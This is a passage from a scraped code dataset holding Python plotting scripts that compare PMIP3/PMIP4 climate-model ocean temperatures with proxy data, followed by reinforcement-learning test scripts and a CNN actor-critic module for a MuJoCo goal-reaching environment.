\"lat\",\"TIME8\": \"time\",\"TOSMRI\":\"tos\"})\nMRI_3 = xr.concat([MRI_3.sel(time=(MRI_3.time[1])), MRI_3.sel(time=(MRI_3.time[2]))], dim=\"time\")\nMRI_3 = MRI_3.mean(dim='time')\nCCSM4_3 = CCSM4_3.rename({\"LON\": \"lon\",\"LAT\": \"lat\",\"CCSM4\":\"tos\"})\nGISS_3 = GISS_3.rename({\"LON\": \"lon\",\"LAT\": \"lat\",\"GISS\":\"tos\"})\nMPI_3 = MPI_3.rename({\"LON\": \"lon\",\"LAT\": \"lat\",\"MPI\":\"tos\"})\nCNRM_3 -= 273.15\nGISS_3 -= 273.15\nIPSL_3 -= 273.15\nMIROC_3 -= 273.15\nMPI_3 -= 273.15\nMRI_3 -= 273.15\nFGOALS_3 -= 273.15\nCCSM4_3 -= 273.15\nPMIP3names = 
['CNRM','GISS-E2-R','IPSL-CM5A-LR','MIROC-ESM-P','MPI-ESM-P','MRI-CGCM3','FGOALS-G2','CCSM4']\nPMIP3models = [CNRM_3,GISS_3,IPSL_3,MIROC_3,MPI_3,MRI_3,FGOALS_3,CCSM4_3]\n\n# PMIP4 SST\nAWI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/AWI_SST_lonconverted.nc',decode_times=False)\nCESM12 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/b.e12.B1850C5.f19_g16.i21ka.03.pop.h.vars.08010900.climo_regrid.nc',decode_times=False)\nLOVECLIM = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/cresum18250_regrid.nc',decode_times=False)\nMIROC_4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/MIROC_PMIP4_tos_regrid.nc',decode_times=False)\nIPSL_4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/IPSL_SSTfixed.nc',decode_times=False)\nIPSL_4 = IPSL_4.rename({\"LON\": \"lon\",\"LAT\": \"lat\",\"TIME_COUNTER\":\"time\",\"SA\":\"tos\"})\nCCSM4UoT = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/CCSM4-UoT_sst.nc',decode_times=False)\nMPI_4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/MPI_PMIP4_tos_regrid.nc',decode_times=False)\n\n# getting summer months\nAWI = xr.concat([AWI.sel(time=(AWI.time[1::12])), AWI.sel(time=(AWI.time[2::12]))], dim=\"time\") # Feb March\nAWI = AWI.mean(dim='time')\nAWI = AWI.tos\nMIROC_4 = xr.concat([MIROC_4.sel(time=(MIROC_4.time[1::12])), MIROC_4.sel(time=(MIROC_4.time[2::12]))], dim=\"time\") # Feb march\nMIROC_4 = MIROC_4.mean(dim='time')\nMIROC_4 = MIROC_4.tos\nCESM12 = xr.concat([CESM12.sel(time=(CESM12.time[1])), CESM12.sel(time=(CESM12.time[2]))], dim=\"time\")\nCESM12 = CESM12.mean(dim='time')\nCESM12 = CESM12.TEMP\nCESM12 = CESM12[0,:,:]\nCCSM4UoT = xr.concat([CCSM4UoT.sel(time=(CCSM4UoT.time[2::12])), CCSM4UoT.sel(time=(CCSM4UoT.time[3::12]))], dim=\"time\")\nCCSM4UoT = CCSM4UoT.mean(dim='time')\nCCSM4UoT = CCSM4UoT.tos\nIPSL_4 = xr.concat([IPSL_4.sel(time=(IPSL_4.time[1])), IPSL_4.sel(time=(IPSL_4.time[2]))], dim=\"time\") # Feb March\nIPSL_4 = IPSL_4.mean(dim='time')\nIPSL_4 = IPSL_4.tos-273.15\nMPI_4 = xr.concat([MPI_4.sel(time=(MPI_4.time[1::12])), MPI_4.sel(time=(MPI_4.time[2::12]))], dim=\"time\")\nMPI_4 = MPI_4.mean(dim='time')\nMPI_4 = MPI_4.tos\nLOVEsic = LOVECLIM.sst\nfeb = LOVEsic[1:2400:12]\nmar = LOVEsic[2:2400:12]\nmar = mar.mean(dim='time')\nfeb = feb.mean(dim='time')\nLOVECLIM = (mar+feb)/2\nPMIP4models = [MIROC_4, IPSL_4, MPI_4,AWI,LOVECLIM,CESM12,CCSM4UoT]\nPMIP4names= ['MIROC-ES2L','IPSL-CM5A2','MPI-ESM1-2','AWI-ESM-1','LOVECLIM','CESM1.2','UoT-CCSM4']\n\n\n# LOVECLIM sensitivity models SST\nweakNA = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVESST/V3LNAw-SSTREGRID.nc')\nweakNA_AB = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVESST/weakNA_ABSST_sum.nc')\nweakNA = weakNA.rename({\"TIME\":\"time\",\"SST\":\"tos\"})\nweakNA_AB = weakNA_AB.rename({\"AX006\":\"time\",\"SSTNHWSOW\":\"tos\",\"LON\":\"lon\",\"LAT\":\"lat\"})\n\nweakNA = weakNA.tos\nfeb = weakNA[1::12,:,:]\nfeb = feb.mean(dim='time')\nmar = weakNA[2::12,:,:]\nmar = mar.mean(dim='time')\nweakNA_sum = (feb+mar)/2\nweakNA_AB = weakNA_AB.tos\nfeb1 = weakNA_AB[1::12,:,:]\nfeb1 = feb1.mean(dim='time')\nmar1 = weakNA_AB[2::12,:,:]\nmar1 = mar1.mean(dim='time')\nweakNA_AB_sum = (feb1+mar1)/2\nLOVEmodels = [weakNA_sum,weakNA_AB_sum]\nLOVEnames = ['weakNA','weakNA_AB']\n\n# legends\n\nproxy = mlines.Line2D([], [], color='black', linestyle ='solid',label = 'Proxy 1˚ isoline')\nmodel = mlines.Line2D([], [], color='black', linestyle ='dashed',label = 'Model 1˚ isoline')\n\n\nnrows=5\nncols=4\nextent = [-180, 180, -90, -35]\n\nfig, ax = 
plt.subplots(nrows=nrows,ncols=ncols,\n subplot_kw={'projection': ccrs.SouthPolarStereo()},\n figsize=(16,14))\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nax=ax.flatten()\ntheta = np.linspace(0, 2*np.pi, 100)\ncenter, radius = [0.5, 0.5], 0.5\nverts = np.vstack([np.sin(theta), np.cos(theta)]).T\ncircle = mpath.Path(verts * radius + center)\n\ncm = plt.cm.get_cmap('RdYlBu_r')\ncmap = mpl.cm.RdYlBu_r\nbounds = [-2,0,0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,5.5,6,6.5,7,7.5,8,10,12]\n\nnorm = mpl.colors.BoundaryNorm(bounds, cmap.N, extend='both')\n\n\n# plt.\n# 60 has been good\n# 21 levels brought me down to 3.5 MB\nlevels= 21\n\nfor n in range(15):\n ax[n].set_boundary(circle, transform=ax[n].transAxes)\n ax[n].gridlines(linestyle='--',zorder=4)\n ax[n].set_extent(extent, crs=ccrs.PlateCarree())\n #gl = ax[n].gridlines(crs=ccrs.PlateCarree(),draw_labels=True, dms=True, x_inline=True, y_inline=True,linestyle='--')\n ax[n].coastlines(zorder=4)\n ax[n].add_feature(cfeature.LAND, facecolor='1', edgecolor='k',zorder=3)\n ax[n].set_aspect('equal')\nfor n in range(16,18):\n ax[n].set_boundary(circle, transform=ax[n].transAxes)\n ax[n].gridlines(linestyle='--',zorder=4)\n ax[n].set_extent(extent, crs=ccrs.PlateCarree())\n #gl = ax[n].gridlines(crs=ccrs.PlateCarree(),draw_labels=True, dms=True, x_inline=True, y_inline=True,linestyle='--')\n ax[n].coastlines(zorder=4)\n ax[n].add_feature(cfeature.LAND, facecolor='1', edgecolor='k',zorder=3)\n ax[n].set_aspect('equal')\n\nfor i in range(len(PMIP3models)):\n ax[i].contourf(PMIP3models[i].lon,PMIP3models[i].lat,PMIP3models[i].tos,norm=norm,cmap=cm,levels = levels, transform=ccrs.PlateCarree())\n ax[i].contour(PMIP3models[i].lon,PMIP3models[i].lat,PMIP3models[i].tos,colors='black',linestyles='dashed',levels = [1], transform=ccrs.PlateCarree())\n ax[i].scatter(data.Longitude,data.Latitude,c=data.LGM, norm=norm,s=27,cmap=cm,edgecolors='k', transform=ccrs.PlateCarree(),zorder=5)\n one = ax[i].tricontour(lonconverted,y,z,colors=['black'],levels=[1], transform=ccrs.PlateCarree(),zorder=4)\n ax[i].text(160,-28,PMIP3names[i],transform=ccrs.PlateCarree())\n\nfor j in range(7):\n ax[j+8].contourf(PMIP4models[j].lon,PMIP4models[j].lat,PMIP4models[j],norm=norm,cmap=cm,levels = levels, transform=ccrs.PlateCarree())\n ax[j+8].contour(PMIP4models[j].lon,PMIP4models[j].lat,PMIP4models[j],colors='black',linestyles='dashed',levels = [1], transform=ccrs.PlateCarree())\n ax[j+8].scatter(data.Longitude,data.Latitude,c=data.LGM, norm=norm,s=27,cmap=cm,edgecolors='k', transform=ccrs.PlateCarree(),zorder=5)\n one = ax[j+8].tricontour(lonconverted,y,z,colors=['black'],levels=[1], transform=ccrs.PlateCarree(),zorder=4)\n ax[j+8].text(160,-28,PMIP4names[j],transform=ccrs.PlateCarree())\n\nfor l in range(2):\n ax[l+16].contourf(LOVEmodels[l].lon,LOVEmodels[l].lat,LOVEmodels[l],norm=norm,cmap=cm,levels = levels, transform=ccrs.PlateCarree())\n ax[l+16].contour(LOVEmodels[l].lon,LOVEmodels[l].lat,LOVEmodels[l],colors='black',linestyles='dashed',levels = [1],transform=ccrs.PlateCarree())\n ax[l+16].scatter(data.Longitude,data.Latitude,c=data.LGM, norm=norm,s=27,cmap=cm,edgecolors='k', transform=ccrs.PlateCarree(),zorder=5)\n one = ax[l+16].tricontour(lonconverted,y,z,colors=['black'],levels=[1], transform=ccrs.PlateCarree(),zorder=4)\n ax[l+16].text(160,-28,LOVEnames[l],transform=ccrs.PlateCarree())\n\n# plt.subplots_adjust(hspace=0.07,wspace=0)\n\n# cb_ax =\n# cbar =\n# cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])\n# 
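NOTE: manual colorbar axes kept for reference; the shared colorbar is created below\n# 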
plt.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),cax=cb_ax)\nplt.tight_layout()\ncb = plt.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),ax=ax.ravel().tolist(), shrink=0.95)\ncb.set_label(label='Temperature ($^{\\circ}$C)', size='large', weight='bold')\ncb.ax.tick_params(labelsize='large')\nplt.legend(handles=[proxy,model],frameon=False,fontsize=15)\nax[15].axis('off')\nax[18].axis('off')\nax[19].axis('off')\nplt.show()\n#plt.savefig('Figures/Figure3_9.27.21.eps',dpi=200)\n"
},
{
"alpha_fraction": 0.6451761722564697,
"alphanum_fraction": 0.6996461153030396,
"avg_line_length": 37.45561981201172,
"blob_id": "edae4bd38cc5c5fcb90c151791128a679facfa9c",
"content_id": "864676ccc8cb02d5917eeffc79ec45a2ab5181ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6500,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 169,
"path": "/Figure4_SO.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import xarray as xr\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\n\n# PMIP3\nCCSM4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/CCSM4ptemp_PMIP3.nc')\nCNRM = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/CNRMptemp_PMIP3.nc')\nFGOALS = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/FGOALSptemp_PMIP3.nc')\nGISS = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/GISSptemp_PMIP3.nc')\nIPSL = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/IPSLptemp_PMIP3.nc')\nMIROC = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/MIROCptemp_PMIP3.nc')\nMPI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/MPIptemp_PMIP3.nc')\nMRI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/MRIptemp_PMIP3.nc')\n\n# PMIP4\nCESM12 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/b.e12.B1850C5.f19_g16.i21ka.03.pop.h.vars.08010900.climo_regrid.nc',decode_times=False)\nAWI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/AWIptemp_PMIP4.nc',decode_times=False)\nMPI4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/MPIptemp_PMIP4.nc',decode_times=False)\nLOVE = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/LOVECLIM_ptemp_ATL.nc',decode_times=False) # annual mean instead of summer\nMIROC_4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/MIROC_ptemp_PMIP4_atl.nc',decode_times=False)\n# UoTCCSM4 only sst data\n# IPSL only sst data\n\n\n# LOVECLIM sensitivies\nweakNA = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/weakNA_ABptemp_PMIP3.nc',decode_times=False)\nweakNA_AB = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/weakNAptemp_PMIP3.nc',decode_times=False)\n\n# cleaning up PMIP3\nCCSM4 = CCSM4.PTEMP\nCNRM = CNRM.PTEMP\nFGOALS = FGOALS.PTEMP\nGISS = GISS.PTEMP\nIPSL = IPSL.PTEMP\nMIROC = MIROC.PTEMP\nMPI = MPI.PTEMP\nMRI = MRI.PTEMP\n\n# cleaning up PMIP4\nCESM12 = xr.concat([CESM12.sel(time=(CESM12.time[1])), CESM12.sel(time=(CESM12.time[2]))], dim=\"time\")\nCESM12 = CESM12.mean(dim='time')\nCESM12 = CESM12.TEMP\nCESMatl = xr.concat([CESM12.sel(lon=(CESM12.lon[300:360])), CESM12.sel(lon=(CESM12.lon[0:20]))], dim=\"lon\")\nCESMatl = CESMatl.mean(dim='lon')\nCESMatl['z_t'] = CESMatl['z_t']/100\nCESM12 = CESMatl\nLOVE = LOVE.PT\nLOVE = LOVE.mean(dim='TIME')\nAWI = AWI.PTEMP\nAWI = AWI.mean(dim='AX007')\nMPI4 = MPI4.PTEMP\nMPI4 = MPI4.mean(dim='AX007')\nMIROC_4 = MIROC_4.PTEMP\n# MIROC_4 = MIROC_4.mean(dim='time')\n\n# cleaning up LOVE\nweakNA = weakNA.PTEMP\nweakNA_AB = weakNA_AB.PTEMP\n\n\n# putting into lists\nPMIP3models = [CNRM,GISS,IPSL,MIROC,MPI,MRI,FGOALS,CCSM4]\nPMIP3names = ['CNRM','GISS-E2-R','IPSL-CM5A-LR','MIROC-ESM-P','MPI-ESM-P','MRI-CGCM3','FGOALS-G2','CCSM4']\n\n#PMIP4models = [MIROC_4, IPSL_4, MPI_4,AWI,LOVECLIM,CESM12,CCSM4UoT]\n#PMIP4names= ['MIROC-ES2L','IPSL-CM5A2','MPI-ESM1-2','AWI-ESM-1','LOVECLIM','CESM1.2','UoT-CCSM4']\nPMIP4names= ['MIROC-ES2L','MPI-ESM1-2','AWI-ESM-1','LOVECLIM','CESM1.2']\n\nLOVEmodels = [weakNA,weakNA_AB]\nLOVEnames = ['weakNA','weakNA_AB']\n\n# renaming\nPMIP3models[0] = PMIP3models[0].rename({\"LEV1\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[1] = PMIP3models[1].rename({\"LEV3\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[2] = PMIP3models[2].rename({\"LEV4\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[3] = PMIP3models[3].rename({\"LEV5\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[4] = PMIP3models[4].rename({\"LEV6\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[5] = PMIP3models[5].rename({\"LEV7\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[6] = PMIP3models[6].rename({\"LEV2\": 
\"lev\",\"LAT\": \"lat\"})\nPMIP3models[7] = PMIP3models[7].rename({\"LEV\": \"lev\",\"LAT\": \"lat\"})\n\n# setting up desired levels\nfirst = np.arange(-2,2.2,0.2)\nsecond = np.arange(2,8.5,.5)\nthird = np.arange(8,30,3)\nbounds = []\nfor numbers in first:\n bounds.append(numbers)\nfor numbers in second:\n bounds.append(numbers)\nfor numbers in third:\n bounds.append(numbers)\nnrows=4\nncols=4\n\nfig, ax = plt.subplots(nrows=nrows,ncols=ncols,figsize=(16,10),sharey='row',sharex='col')\n\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nax=ax.flatten()\n\ncm = plt.cm.get_cmap('RdYlBu_r')\ncmap = mpl.cm.RdYlBu_r\n\nnorm = mpl.colors.BoundaryNorm(bounds, cmap.N, extend='both')\nlevels = 75 #75\n\nfor n in range(15):\n for axis in ['top','bottom','left','right']:\n ax[n].spines[axis].set_linewidth(3)\n\n # PMIP 3\nfor i in range(len(PMIP3names)):\n ax[i].contourf(PMIP3models[i].lat,PMIP3models[i].lev,PMIP3models[i],norm=norm,cmap=cm,levels = levels)\n ax[i].text(-60,4800,PMIP3names[i])\n ax[i].grid(ls=':')\n #ax[i].invert_yaxis()\n ax[i].set_xlim(-75,-35)\n ax[i].set_ylim(5000,0) #by 500 is how i did it before\n ax[i].tick_params(axis=\"both\", direction=\"out\", length=5, width=3, color=\"black\")\n\n\n# until I get all the models going\nax[8].contourf(MIROC_4.LAT,MIROC_4.LEV,MIROC_4,norm=norm,cmap=cm,levels = levels)\nax[9].contourf(MPI4.LAT,MPI4.LEV,MPI4,norm=norm,cmap=cm,levels = levels)\nax[10].contourf(AWI.LAT,AWI.DEPTH,AWI,norm=norm,cmap=cm,levels = levels)\nax[11].contourf(LOVE.LAT,LOVE.Z,LOVE-273.15,norm=norm,cmap=cm,levels = 1000)\nax[12].contourf(CESM12.lat,CESM12.z_t,CESM12,norm=norm,cmap=cm,levels = levels)\n\n# PMIP4\nfor j in range(5):\n # ax[j+8].contourf(PMIP4models[j].lon,PMIP4models[j].lat,PMIP4models[j],norm=norm,cmap=cm,levels = levels)\n ax[j+8].text(-60,4800,PMIP4names[j])\n ax[j+8].grid(ls=':')\n #ax[i].invert_yaxis() CESM needs inversion\n ax[j+8].set_xlim(-75,-35)\n ax[j+8].set_ylim(5000,0) #by 500 is how i did it before\n ax[j+8].tick_params(axis=\"both\", direction=\"out\", length=5, width=3, color=\"black\")\n\n\n\n# LOVE sensitivity\nfor l in range(2):\n ax[l+13].contourf(LOVEmodels[l].LAT,LOVEmodels[l].Z,LOVEmodels[l],norm=norm,cmap=cm,levels = levels)\n ax[l+13].text(-60,4800,LOVEnames[l])\n ax[l+13].grid(ls=':')\n ax[l+13].invert_yaxis()\n ax[l+13].set_xlim(-75,-35)\n ax[l+13].set_ylim(5000,0) #by 500 is how i did it before\n ax[l+13].tick_params(axis=\"both\", direction=\"out\", length=5, width=3, color=\"black\")\n\nax[15].axis('off')\nfig.add_subplot(111, frameon=False)\n# hide tick and tick label of the big axes\nplt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False)\nplt.grid(False)\nplt.ylabel(\"Depth (m)\",fontsize=15,fontweight='bold')\nplt.xlabel(\"Latitude (˚)\",fontsize=15,fontweight='bold')\n\n#plt.tight_layout()\ncb = plt.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),ax=ax.ravel().tolist(), shrink=0.975)\ncb.set_label(label='Temperature ($^{\\circ}$C)', size='large', weight='bold')\ncb.ax.tick_params(labelsize='large')\n\n#plt.show()\nplt.savefig('Figures/Figure4_SO.pdf')\n"
}
] | 10 |
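The plotting script in the record above builds its contour levels from three unevenly spaced segments and maps them through a BoundaryNorm, so colour resolution is finest near 0 °C. Below is a minimal, self-contained sketch of that pattern on synthetic data; the toy temperature field, axis ranges, and output filename are invented for illustration, and np.unique is added because the original concatenation leaves duplicate segment endpoints while BoundaryNorm expects strictly increasing boundaries.

import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt

# Same three-segment level scheme as the script: fine steps to 2, medium to 8,
# coarse above; np.unique sorts and drops the duplicated endpoints (2 and 8).
bounds = np.unique(np.concatenate([np.arange(-2, 2.2, 0.2),
                                   np.arange(2, 8.5, 0.5),
                                   np.arange(8, 30, 3)]))

lat = np.linspace(-75, -35, 80)              # latitude (degrees)
depth = np.linspace(0, 5000, 60)             # depth (m)
LAT, DEPTH = np.meshgrid(lat, depth)
temp = 25.0 * np.exp(-DEPTH / 1500.0) - 2.0  # toy temperature section

cmap = mpl.cm.RdYlBu_r
norm = mpl.colors.BoundaryNorm(bounds, cmap.N, extend='both')  # extend= needs matplotlib >= 3.3

fig, ax = plt.subplots()
ax.contourf(LAT, DEPTH, temp, levels=75, cmap=cmap, norm=norm)
ax.set_ylim(5000, 0)                         # depth increases downward, as in the record
fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), ax=ax,
             label='Temperature (°C)')
fig.savefig('section_sketch.png')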
harjatinsingh/mujoco-env | https://github.com/harjatinsingh/mujoco-env | 0a364ff64a7f026dca4bef35d2a822d7b000a4b7 | 57e37a448c07f9ce537ecf946478d5a287495080 | f6426f34e05a2f5f180f0ae6592bf9283e3c8cae | refs/heads/master | 2020-03-18T17:03:54.049239 | 2018-06-20T16:15:41 | 2018-06-20T16:15:41 | 135,003,913 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5259116888046265,
"alphanum_fraction": 0.5595009326934814,
"avg_line_length": 28.799999237060547,
"blob_id": "a5ff9590174bda58dc86747d172352e1eea79add",
"content_id": "e785ef1329b9ba0556c3553584bdcb458c266c22",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1042,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 35,
"path": "/baselines_hrl/test/square2d_visual_test.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 03/06/2018\nimport gym\nimport envs\nimport cv2 as cv\nimport scipy.misc\nfrom pprint import pprint\n\nfrom envs.square2d import Square2dVisualSimpleEnv\nimport time\nimport numpy as np\nif __name__ == '__main__':\n test_env = 'Square2dVisualSimple-v0'\n #env = gym.make(test_env)\n env = Square2dVisualSimpleEnv(horizon=10000)\n for i in range(5):\n env.reset()\n done = False\n time_count = 0\n while not done:\n time_count += 1\n action = env.action_space.sample()\n #env.set_goal_location([0.3,0.3])\n obs, reward, done, _ = env.step(action)\n #print(env.get_goal_location())\n #print(len(obs))\n #print(reward.shape)\n #print(done.shape)\n #print(reward)\n img = env.render()\n #print(img.shape)\n cv.imshow('display', obs['observation'])\n #cv.imshow('display', obs['desired_goal'])\n cv.waitKey(1)\n #time.sleep(1000000)\n time.sleep(3)"
},
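The test above drives an environment that returns the HER-style dict observation with 'observation', 'achieved_goal', and 'desired_goal' keys. A stand-in sketch of that interface contract, runnable without MuJoCo — the ToyGoalEnv class and its dynamics are invented here purely to illustrate the shape of reset/step:

import numpy as np

class ToyGoalEnv:
    """Stand-in goal env: state is a 2-D point pushed around by the action."""
    def __init__(self, threshold=0.1, horizon=50):
        self.threshold, self.horizon = threshold, horizon

    def reset(self):
        self.t = 0
        self.pos = np.zeros(2)
        self.goal = np.random.uniform(-0.5, 0.5, size=2)
        return self._obs()

    def _obs(self):
        return {'observation': self.pos.copy(),
                'achieved_goal': self.pos.copy(),
                'desired_goal': self.goal.copy()}

    def step(self, action):
        self.pos += 0.05 * np.clip(action, -1.0, 1.0)
        self.t += 1
        d = np.linalg.norm(self.pos - self.goal)
        reward = -float(d > self.threshold)               # sparse reward
        done = d <= self.threshold or self.t >= self.horizon
        return self._obs(), reward, done, {'is_success': d <= self.threshold}

env = ToyGoalEnv()
obs, done = env.reset(), False
while not done:
    obs, reward, done, info = env.step(np.random.uniform(-1, 1, size=2))
print('finished, success =', info['is_success'])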
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 12,
"blob_id": "b50f2748dcf72b2f85479b6fd660b8823c0a1918",
"content_id": "fd588b8f2dc510ceca4ebfb0af6182c04eb405fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13,
"license_type": "no_license",
"max_line_length": 12,
"num_lines": 1,
"path": "/README.md",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# mujoco-env\n"
},
{
"alpha_fraction": 0.49089905619621277,
"alphanum_fraction": 0.5173745155334473,
"avg_line_length": 29.233333587646484,
"blob_id": "5896b54eb301e1f1deda4964e0d1fffcc57a172d",
"content_id": "2feec9c48407cb2beae1f8741e2ac433377a3f55",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1813,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 60,
"path": "/baselines_hrl/test/square2d_visual_play.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 03/06/2018\nimport gym\nimport envs\nimport cv2 as cv\nimport scipy.misc\nimport pickle\nfrom pprint import pprint\n\n\nfrom envs.square2d import Square2dVisualSimpleEnv\nimport time\nimport numpy as np\nif __name__ == '__main__':\n test_env = 'Square2dVisual-v0'\n #env = gym.make(test_env)\n policy_file = '/media/part/cmu_ri/deep/deep_RL/data/local/square2d-debug/square2d_debug_2018_06_17/policy_best.pkl'\n with open(policy_file, 'rb') as f:\n policy = pickle.load(f)\n #env_name = policy.info['env_name']\n\n\n env = Square2dVisualSimpleEnv(horizon=1000)\n for i in range(5):\n obs = env.reset()\n done = False\n time_count = 0\n while not done:\n o = obs['observation']\n ag = obs['achieved_goal']\n g = obs['desired_goal']\n \n action = policy.get_actions(o.flatten(),ag,g)\n #action = env.action_space.sample()\n print(action)\n \n time_count += 1\n #action = env.action_space.sample()\n #env.set_goal_location([0.3,0.3])\n obs, reward, done, info = env.step(action)\n #print(done)\n #print(info['is_success'])\n #print(reward)\n if reward == -0.0:\n done = True\n #print(reward)\n #input(\"-----------------\")\n \n print(reward) \n #print(env.get_goal_location())\n #print(len(obs))\n #print(reward.shape)\n #print(done.shape)\n #print(reward)\n img = env.render()\n #print(img.shape)\n cv.imshow('display', o)\n #cv.imshow('display', obs['desired_goal'])\n cv.waitKey(100)\n #time.sleep(1000000)\n time.sleep(3)"
},
{
"alpha_fraction": 0.5465013384819031,
"alphanum_fraction": 0.5562444925308228,
"avg_line_length": 28.710525512695312,
"blob_id": "00f6d08b38aaa31d49d24a1cfc43f986e2c4a142",
"content_id": "9204f6ef875f230e35a71a310b20ab5116e636c9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1129,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 38,
"path": "/baselines_hrl/test/env_test.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 18/03/2018 \nimport gym\nimport envs\nfrom envs.gym_robotics_visual import utils\nimport scipy.misc\n\n\ndef test_image_rendering():\n env = gym.make(test_env)\n obs = env.reset()\n rgbd_img = env.env.get_image_obs(depth=True)\n rgb_img = rgbd_img[:, :, :3]\n dep_img = rgbd_img[:, :, -1]\n scipy.misc.imsave('./test/obs_rgb.jpg', rgb_img)\n scipy.misc.imsave('./test/obs_d.jpg', dep_img)\n\n goal_rgb_img, goal_dep_img = utils.separate_img(obs['desired_goal'])\n scipy.misc.imsave('./test/goal_rgb.jpg', goal_rgb_img)\n scipy.misc.imsave('./test/goal_d.jpg', goal_dep_img)\n\n # while True:\n # action = env.action_space.sample()\n # obs, _, _, _ = env.step(action)\n # env.render()\n\ndef test_visualization():\n env = gym.make(test_env)\n env.reset()\n while True:\n action = env.action_space.sample()\n obs, _, _, _ = env.step(action)\n env.render()\n\n\nif __name__ == '__main__':\n test_env = 'VisualFetchSlide-v0'\n test_image_rendering()\n # test_visualization()\n"
},
{
"alpha_fraction": 0.5246672034263611,
"alphanum_fraction": 0.5408509373664856,
"avg_line_length": 44.60714340209961,
"blob_id": "ecf28e31aa4237e9a14b3371344995ea742604a5",
"content_id": "eeacd17f2bdf11b78e64e18e1afefa09d3b64fbf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3831,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 84,
"path": "/baselines_hrl/baselines/her/cnn_actor_critic.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 25/03/2018 \nimport tensorflow as tf\nfrom baselines.her.util import store_args, nn\nimport numpy as np\n\n\ndef cnn_one_stream(input_net, scope='phi', reuse=False):\n with tf.variable_scope(scope, reuse=reuse):\n net = tf.layers.conv2d(name='conv1', inputs=input_net, filters=64, kernel_size=[2, 2], padding='same',\n activation=tf.nn.relu)\n net = tf.layers.max_pooling2d(net, [3, 3], 2, padding='valid')\n net = tf.layers.conv2d(name='conv2', inputs=net, filters=64, kernel_size=[2, 2], padding='same',\n activation=tf.nn.relu)\n net = tf.layers.max_pooling2d(net, [3, 3], 2, padding='valid')\n net = tf.layers.conv2d(name='conv3', inputs=net, filters=64, kernel_size=[2, 2], padding='same',\n activation=tf.nn.relu)\n net = tf.layers.max_pooling2d(net, [3, 3], 2, padding='valid')\n net = tf.layers.conv2d(name='conv4', inputs=net, filters=64, kernel_size=[2, 2], padding='same',\n activation=tf.nn.relu)\n shape = net.get_shape().as_list() # a list: [None, 9, 2]\n dim = np.prod(shape[1:]) # dim = prod(9,2) = 18\n net = tf.reshape(net, [-1, dim])\n\n net = tf.layers.dense(name='conv_fc', inputs=net, units=64)\n return 